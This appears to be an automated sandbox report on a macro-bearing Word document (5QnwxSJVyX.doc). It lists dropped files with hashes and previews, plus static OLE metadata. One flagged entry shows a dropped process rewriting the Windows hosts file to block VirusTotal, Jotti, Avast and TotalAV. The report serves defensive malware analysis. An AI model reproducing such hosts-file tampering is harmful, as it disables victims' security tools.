                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):270198
                                                                                    Entropy (8bit):5.073814698282113
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                    MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                    SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                    SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                    SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):217137
                                                                                    Entropy (8bit):5.068335381017074
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                    MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                    SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                    SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                    SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):254875
                                                                                    Entropy (8bit):5.003842588822783
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                    MD5:377B3E355414466F3E3861BCE1844976
                                                                                    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):344303
                                                                                    Entropy (8bit):5.023195898304535
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                    MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                    SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                    SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                    SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):250983
                                                                                    Entropy (8bit):5.057714239438731
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                    MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                    SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                    SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                    SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):51826
                                                                                    Entropy (8bit):5.541375256745271
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                    MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                    Malicious:false
                                                                                    Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):47296
                                                                                    Entropy (8bit):6.42327948041841
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                    MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                    SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                    SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                    SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                    Malicious:false
                                                                                    Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):34415
                                                                                    Entropy (8bit):7.352974342178997
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                    MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                    Malicious:false
                                                                                    Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):3465076
                                                                                    Entropy (8bit):7.898517227646252
                                                                                    Encrypted:false
                                                                                    SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                    MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                    SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                    SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                    SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                    Malicious:false
                                                                                    Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm (copy)

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):19354
                                                                                    Entropy (8bit):7.4672192051300055
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:Jrt+BNxt/ZtNNU30lagQ9wdMmMlH8xCEGPWl9Jr1jG:VAxllN86abBfr+nG
                                                                                    MD5:F80F0F9C4087694F3DD871C3F3CA866F
                                                                                    SHA1:E6F38B394DD071786D0E34A8D1B4F230A81C3377
                                                                                    SHA-256:E33F05C4F10108B6B2120C88169795AB630C59E811DF27C24702D956945990CC
                                                                                    SHA-512:8F45C5D79CFE71E35660C62C8ADB24609CAC6340B7631E557F72BAAC3EC8B8A8A3B4A3B9EB6F87F81E8119F4A024C635E28650A394D05775286EDC07D5780B6B
                                                                                    Malicious:false
                                                                                    Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):162
                                                                                    Entropy (8bit):3.449646024615507
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KVGl/lilKlRAGl/r5lkPFSyCMoYlgFisFSyO0h9TYltyJyd5:KVy/4KDZciMfX4TItyJO5
                                                                                    MD5:0CB35A94DA1E83E9987DA7178411DD52
                                                                                    SHA1:6A8D2EB5930EADF9B949DAFECF577321C6F51C64
                                                                                    SHA-256:F8E11727AA2180B399184453D2BD6BECBE218F9B35B8E2A004DAEF8918C777A8
                                                                                    SHA-512:2AEDE1121B570511B0016DAF4C86A17EEA8700FD738FCBF0723FBDE3BDC6E1AF6A72B3D66F07695173E793BFC6DAA1AA6197C9C0973E0B1D13714F87C3765618
                                                                                    Malicious:false
                                                                                    Preview:.user..................................................j.o.n.e.s...............m..w...4q.Xz!kM.....q....i......m..w...Eq..z....B...B.M.............B...m.85q..Eq.

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~WRD0000.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):19354
                                                                                    Entropy (8bit):7.4672192051300055
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:Jrt+BNxt/ZtNNU30lagQ9wdMmMlH8xCEGPWl9Jr1jG:VAxllN86abBfr+nG
                                                                                    MD5:F80F0F9C4087694F3DD871C3F3CA866F
                                                                                    SHA1:E6F38B394DD071786D0E34A8D1B4F230A81C3377
                                                                                    SHA-256:E33F05C4F10108B6B2120C88169795AB630C59E811DF27C24702D956945990CC
                                                                                    SHA-512:8F45C5D79CFE71E35660C62C8ADB24609CAC6340B7631E557F72BAAC3EC8B8A8A3B4A3B9EB6F87F81E8119F4A024C635E28650A394D05775286EDC07D5780B6B
                                                                                    Malicious:false
                                                                                    Preview:PK..........!.Q3.p............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ......J..0....K......H...R*.D.g..3.H....M!`.l.....J.j;*...>.b.Fa...B....wz...<`F..K6.._s.r.F`.<X.T....7....U.._t:.\:...<&....A%&:f.9..H.hd..*1y.Lx.k)".........e..k.g.....)....&......A...3..WNN.U..e...<....'4(.....x.....nh.t.....p7..j..s...I@.w6.X..C.Tp...r+..^..F.N...".az...h.[!F.!...g...i"...C..n9.~l...3.....H..V..9.2.,)s..GZD..mo6M..a.!...q$.......O..r-.........PK..........!.........N......

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                    Category:dropped
                                                                                    Size (bytes):6656
                                                                                    Entropy (8bit):4.313824480659337
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:rLsPtrp213VW0T1MqughNY1IkAKOSuPlQgSu2qDnkGRoadRTObmv2uL/r0p/3K7T:UgxJ4ClXk+dR8UT0U
                                                                                    MD5:B2B12C1B5467D243EE8AF11E549E5562
                                                                                    SHA1:EA0BAF579944D5C4D6B9C21D7F8821CB81A6AF18
                                                                                    SHA-256:75155325070D261583D22F5D9A926DE43A939B7B699133ADDB7169E77B5172ED
                                                                                    SHA-512:90C45B80D473CA2FD3DEC2E06D021A00AEEEAC9B3B6FA6DB8ACD338A039C4A6897607D5BA9EAC0BDB4909786826B8F390E07D4757B32F94A5C599501E35CF581
                                                                                    Malicious:false
                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\Desktop\~$nwxSJVyX.doc

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):162
                                                                                    Entropy (8bit):2.719445346345921
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KVGl/lilKlRAGlPl/asxsVpS3idlfll/1gRGVlO:KVy/4KDZcb83W1gRGVlO
                                                                                    MD5:EC5AEE832347320503EF2A7817D8C748
                                                                                    SHA1:C4B2D1E6126B691581D0C9FF51D18F760738A276
                                                                                    SHA-256:6261923FFDDDBD1C615EB61D7AD1A43B3F996EF21AFC0C92452B5F847714386C
                                                                                    SHA-512:8B6F8D686AEE62DE3E62B5D0063D989202DF9E03444EAF101AF2531C8632F8B6EA8F20EED49AC9A236E7E65C092611048A29558B0E5E752921A2FB55FAF511FF
                                                                                    Malicious:false
                                                                                    Preview:.user..................................................j.o.n.e.s...|...p.......T+....pL7..a.i..............................................T+.'q.}..i......p..=.i

                                                                                    C:\Windows\System32\drivers\etc\hosts

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:ASCII text, with CRLF, LF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):2285
                                                                                    Entropy (8bit):4.576057831611122
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:vDZhyoZWM9rU5fFc7w09PI8A+VyUq8UwWsnNhUm:vDZEurK9z8TwU0wWsn/
                                                                                    MD5:A58B2342D8EAA7EA695FD216006E3DDD
                                                                                    SHA1:A286457D10D2A50E7B2699BDF55D85081FADD23C
                                                                                    SHA-256:C3AF2F576A3758B1BCDBD491B6021FBF52F6AFF4C0D03F4914D9C3F51A6A6361
                                                                                    SHA-512:B1938B288BECE554759F4FA8341513828487960991AE6C4A8C4D3958A5669357A6C2F1ED140FF87E740DC4C6AFEB9F16967AE7F4000F41341B802D22D8CE8FC3
                                                                                    Malicious:true
                                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 virusscan.jotti.org..0.0.0.0 www.virusscan.jotti.org..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: USER, Template: Normal, Last Saved By: george, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:00, Create Time/Date: Mon Nov 25 22:57:00 2024, Last Saved Time/Date: Mon Nov 25 17:37:00 2024, Number of Pages: 1, Number of Words: 41, Number of Characters: 238, Security: 0
                                                                                    Entropy (8bit):4.050786992654237
                                                                                    TrID:
                                                                                    • Microsoft Word document (32009/1) 54.23%
                                                                                    • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                    File name:5QnwxSJVyX.doc
                                                                                    File size:45'056 bytes
                                                                                    MD5:5085b78ddbc67c16dd26dc908ee14140
                                                                                    SHA1:87a9084b27f45ac42e23c92db0fd86ad7c5acbb2
                                                                                    SHA256:0faaf305176113777cc706b6df9603c131382a35a0de9efd1cc2e883dd95459d
                                                                                    SHA512:bc1339c87ad19438b33b6cb78e609d36b9b96c9546cbdbd3b9caeeee578ebb8fe7a7d22861434ffc27a345c3adb1200a523fe8deb633f3fb192d2767d3ceda6f
                                                                                    SSDEEP:384:yNu7F46+rfxD8iS8px8SMDZQHMnotf/Bjt1xr2C6Obe3RaZ71zrM4A0jZ6YP/N:C2Ozx73ySttFbK4Z712qj
                                                                                    TLSH:B313B411B2D5DE17E65646310ED7C2EAB23EBC09AF11C30B32587B3E7E75A308A21B55
                                                                                    File Content Preview:........................>.......................0...........3.............../..................................................................................................................................................................................

                                                                                    File Icon

                                                                                    Icon Hash:35e1cc889a8a8599

                                                                                    Static OLE Info

                                                                                    General

                                                                                    Document Type:OLE
                                                                                    Number of OLE Files:1

                                                                                    OLE File "5QnwxSJVyX.doc"

                                                                                    Indicators
                                                                                    Has Summary Info:
                                                                                    Application Name:Microsoft Office Word
                                                                                    Encrypted Document:False
                                                                                    Contains Word Document Stream:True
                                                                                    Contains Workbook/Book Stream:False
                                                                                    Contains PowerPoint Document Stream:False
                                                                                    Contains Visio Document Stream:False
                                                                                    Contains ObjectPool Stream:False
                                                                                    Flash Objects Count:0
                                                                                    Contains VBA Macros:True
                                                                                    Summary
                                                                                    Code Page:1252
                                                                                    Title:
                                                                                    Subject:
                                                                                    Author:USER
                                                                                    Keywords:
                                                                                    Comments:
                                                                                    Template:Normal
                                                                                    Last Saved By:george
                                                                                    Revion Number:3
                                                                                    Total Edit Time:180
                                                                                    Create Time:2024-11-25 22:57:00
                                                                                    Last Saved Time:2024-11-25 17:37:00
                                                                                    Number of Pages:1
                                                                                    Number of Words:41
